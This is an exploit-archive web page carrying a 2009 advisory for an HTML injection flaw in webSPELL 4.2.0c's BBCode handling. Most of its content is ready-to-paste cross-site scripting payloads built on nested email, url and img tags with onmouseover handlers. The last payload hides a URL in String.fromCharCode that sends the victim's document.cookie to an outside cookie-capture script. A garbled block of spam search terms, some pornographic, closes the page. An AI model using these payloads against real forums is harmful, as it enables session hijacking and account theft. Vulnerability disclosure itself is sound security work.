about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , webSPELL BBCode HTML Injection Vulnerability


Title webSPELL BBCode HTML Injection Vulnerability
Published 2009-04-16-12:00AM
Updated 2009-04-21-06:06PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  YEnH4ckEr
Vulnerable  webSPELL webSPELL 4.2.0c
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following examples are available:[email][img]http://www.example.com onmouseover=alert(1) [/img][/email]
[email][email][img]http://www.example.com onmouseover=alert(1) [/img] [/email][/email]
[email][url][img]http://www.example.com onmouseover=alert(1) [/img] [/url][/email]
[email][email][url]http://www.example.com onmouseover=alert(1) [/url]http://' onmouseover=alert(1) [/email][/email]
[email][email][url]http://www.example.com' onmouseover=alert(1) [/url]http:// onmouseover=alert(1) [/email][/email]
[email][email][url]http://www.example.com' onmouseover=alert(1) [/url]http:// ' onmouseover=alert(1) [/email][/email]
[email][email][url]http://www.example.com' onmouseover=alert(1) [/url] ' onmouseover=alert(1) [/email][/email]
[email][email][url]http://www.example.com onmouseover=alert(1) [/url] ' onmouseover=alert(1) [/email][/email]
[email][img]http://www.example.com onmouseover=document.location=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,109,121,112,104,112,99,111,111,107,105,101,115,116,101,97,108,105,110,103,46,101,115,47,99,97,112,116,117,114,101,116,104,101,99,111,111,107,105,101,115,46,112,104,112,63,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61)+document.cookie [/img][/email]
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 13:40:55 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Www.adults all cartoo Joomla/com php-nuke 2 all cartoo www.lczxxx doosan.5d6 feer sex f doosan.5d6 thrisha se dvd.jx0452 Invision horde snapgear merak mail www.sexs.c sexy imag hi.baidu.c 5bd Lina xxx girles Invision sakilasex morris fotos de v free porn WWW.MY LED wow sex veduo localhost womansex a oneadmin.h Microsoft Free sex a Muy zorras Sanianudep www.jiuyao swim wear windowx+xp etomite language/l mambo+Remo Cheeseands iyigui.tao www.ahdian www.ppmar. www.sinven Gril sixy Www.Xxl.Tv Nucleus/4.